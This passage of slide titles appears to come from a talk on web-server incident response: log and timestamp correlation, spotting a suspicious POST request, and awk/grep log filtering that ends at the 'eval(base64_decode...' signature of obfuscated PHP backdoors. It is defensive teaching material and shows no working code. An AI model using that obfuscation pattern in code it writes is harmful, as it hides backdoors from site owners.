  18. Example “flow cycle” Presumes you&apos;ve addressed all other security concerns (backups, updates, policy, etc..)
  19. Never stop improving
  20. Time stamp correlation with file creations, logs, etc... Note the POST request … shady!
  21. Awk/grep/sort madness!
  22. Awk/grep/sort madness!
  23. This eventually breaks down the the old standard “eval(base64_decode...”